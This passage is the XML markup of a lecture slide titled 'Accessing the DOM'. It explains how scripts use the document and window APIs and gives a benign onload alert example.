              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB68440-855E-C347-8A68-F890ADC63C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842250"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5" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBF8111-772E-AC44-AC0F-5DEC1246E5DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="786923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6" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07417CE9-7D9D-794E-9320-27E439E286F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8443913" y="7319963"/>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7" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69F3E29-3D6E-9545-974C-CDDFF4407FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8472488" y="7362825"/>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78" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E751D27-7F32-0B48-9B36-64F8F63F0DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827881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789" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177789" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203179" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777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5179" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B1DE09-1D88-074A-A335-F7DB88DC7AC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8443913" y="7405688"/>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0" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5218A546-C6E6-AC41-A2EA-878B6F1F1C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="847248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1" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC00E0EC-08CC-3742-89ED-3DB533AF511F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9043988"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2" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FACA7046-648D-4E4B-8D8A-66D1C1C0358F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9070975" y="7362825"/>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3" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8BA1679-112A-B448-BA8E-92CBCAFE144D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9043988"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4" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DC3BE1B-3632-5640-B77B-15D5C186A53B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9070975" y="7434263"/>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5" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD63AF21-5C2E-F04D-89EB-CCCC6547B073}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9712325" y="7391400"/>
            <a:ext cx="44450" cy="42863"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 20320"/>
              <a:gd name="T1" fmla="*/ 0 h 20320"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 20320"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 20320"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T4">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="20320" h="20320">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20330" y="20311"/>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6" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1ACAFA9-AEE0-4E49-8C46-FCB712595D17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9653588" y="7331075"/>
            <a:ext cx="65087" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T5" fmla="*/ 0 h 30479"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T7" fmla="*/ 0 h 30479"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T9" fmla="*/ 0 h 30479"/>
              <a:gd name="T10" fmla="*/ 0 w 30479"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T12" fmla="*/ 0 w 30479"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T14" fmla="*/ 0 w 30479"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T17" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T18" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T19" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T20" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T24" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 304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479" h="30479">
                <a:moveTo>
                  <a:pt x="30388" y="15180"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30388" y="6798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23591" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15179" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6797" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6797" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15179" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23591" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30388" y="23574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30388" y="15180"/>
                </a:lnTo>
                <a:close/>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7" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3953173-B976-4C46-AC43-A44DFEC8408C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9480550" y="7323138"/>
            <a:ext cx="103188" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T11" fmla="*/ 0 h 50164"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T14" fmla="*/ 2035069958 w 48260"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T16" fmla="*/ 0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5096" y="49699"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38471" y="45808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47750" y="35706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47067" y="17943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41428" y="6143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32268" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15804" y="2163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4953" y="9550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20495"/>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8" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EEC923D-AA6C-9445-81AE-2C1DFE1699DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9445625" y="7362825"/>
            <a:ext cx="65088"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89" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40E99CF3-94D8-AC43-BD04-DB20DA538C82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9815513" y="7323138"/>
            <a:ext cx="107950" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T4" fmla="*/ 0 w 48260"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T6" fmla="*/ 621453573 w 48260"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T11" fmla="*/ 0 h 50164"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T16" fmla="*/ 2147483646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2697" y="49705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9214" y="45814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711" y="17940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6370" y="6138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32001" y="2169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42849" y="9563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47796" y="20516"/>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190" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A94D1C0-53F2-5D49-A3EB-DA99B219D3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9888538" y="7362825"/>
            <a:ext cx="66675"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31B64387-0775-4B4D-B37A-CB990CA1589F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="223838"/>
            <a:ext cx="4489450" cy="477837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="82768" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3100" spc="243" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Acc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-221" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="11" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="409" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="265" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="88" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="506" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A56E1DE-821D-3144-AB7A-DE22D893B021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9351963" y="7505700"/>
            <a:ext cx="554037" cy="200025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="28057" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1300" spc="-144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135193" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA312F4-4C2E-F341-BCF8-7F6770D53820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="758825" y="806450"/>
            <a:ext cx="8537575"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400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When creating a script (in-line in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>element or by means of a script loading instruction) the API for the document or window elements can be used to manipulate the document itself or to get at the children of that document, which are the various elements in the web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1325"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> displays an alert message by using the alert() function from the window object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="88"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>&lt;body  onload="window.alert(’welcome  to  my  page!’);"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1325"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
